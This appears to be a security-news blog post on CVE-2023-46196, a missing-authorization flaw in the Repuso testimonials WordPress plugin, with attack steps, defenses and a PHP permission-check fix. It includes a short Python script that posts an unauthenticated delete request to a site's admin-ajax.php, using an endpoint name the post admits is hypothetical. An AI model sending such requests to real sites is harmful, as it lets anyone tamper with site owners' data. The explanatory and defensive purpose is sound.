CVE CyberSecurity Database News

CVE-2023-46196 - Missing Authorization in Repuso Social Proof Testimonials and Reviews Plugin – Exploit Details and Defense Guide

Poster -

In the dynamic world of WordPress plugins, security flaws can open gates for major exploits—sometimes without anyone noticing at first. CVE-2023-46196 is a real-world example: a missing authorization vulnerability in the “Social proof testimonials and reviews by Repuso” plugin, which is used widely by websites seeking to display positive customer feedback. This post digs deep into what went wrong, how the exploit works, and what steps you can take to stay safe.

Version: All versions up to and including 4.97

- Issue: Missing authorization for sensitive actions (due to incorrectly configured access control security levels)

This means that certain functions of the plugin could be accessed by anyone—not just site administrators or logged-in users as you would expect.

Why is This a Problem?

WordPress plugins should always check if the current user has the right level of permission before letting them do important stuff (like changing settings or deleting testimonials). When those checks are missing, attackers can jump in and mess with your website.

In simple terms:
*Anyone, including hackers and bots, could potentially access certain privileged actions—even those they’re NOT supposed to.*

Step 1: Scanning for Vulnerable Sites

Attackers look for websites running the Repuso plugin (up to version 4.97).
Public web scanners or even Google dorks can help them find vulnerable websites with the Repuso widget or admin links.

Step 2: Identifying Unprotected Endpoints

The plugin exposes several AJAX (admin-ajax.php) or REST API endpoints that *should* be protected. Due to this vulnerability, no proper authorization checks are in place.

Step 3: Crafting Exploit Requests

Attackers can directly call plugin endpoints without authentication or proper user capability checks, leading to actions like:

Sample Exploit Code

Let’s look at a hypothetical (but realistic) exploit code snippet in Python, assuming the plugin exposes an unprotected AJAX action called repuso_delete_testimonial.

import requests

# REPLACE: 'https://victim.com'; with the target site
url = 'https://victim.com/wp-admin/admin-ajax.php';

data = {
    'action': 'repuso_delete_testimonial',
    'testimonial_id': 1234   # Example testimonial ID to delete
}

response = requests.post(url, data=data)
if response.status_code == 200:
    print("Exploit sent successfully!")
else:
    print("Exploit failed. Status:", response.status_code)

*This code does NOT require any login information!*
Anyone can send this POST request and delete testimonials if the endpoint is left unprotected.

Spammers could inject fake testimonials to harm your reputation.

- Trolls might override widget display settings, breaking your site’s social proof or redirecting users.

Here's how the vulnerability is tracked in official databases

- NVD Entry – CVE-2023-46196 (nvd.nist.gov)
- WPScan Advisory
- Plugin Directory (Repuso)

Description:
> “Missing Authorization vulnerability in Repuso Social proof testimonials and reviews… allows exploiting incorrectly configured access control security levels. This issue affects all plugin versions up to and including 4.97.”

As soon as a patch is offered, update Repuso to the latest version.

2. Disable/Remove If Unneeded:

Limit Public Admin-AJAX Calls:

Restrict access to AJAX and REST endpoints using plugins (like Wordfence), .htaccess, or security rules.

A proper fix would look like this inside the plugin code

if ( ! current_user_can( 'manage_options' ) ) {
    wp_send_json_error( 'Unauthorized' );
}

*This PHP snippet checks if the current user has admin rights before allowing sensitive actions.*

Conclusion

CVE-2023-46196 is a classic example of what happens when plugins skip user authorization checks. If you use Repuso’s Social Proof Testimonials plugin, review your site and always keep plugins updated. Never trust public endpoints that don’t verify user roles—because someone else might exploit that trust.

Stay secure, patch often, and review your WordPress plugin permissions regularly!

References & Further Reading

- CVE-2023-46196 NVD Entry
- WPScan Vulnerability Advisory
- Repuso Plugin on WordPress.org
- OWASP: Broken Access Control

Timeline

Published on: 01/02/2025 12:15:11 UTC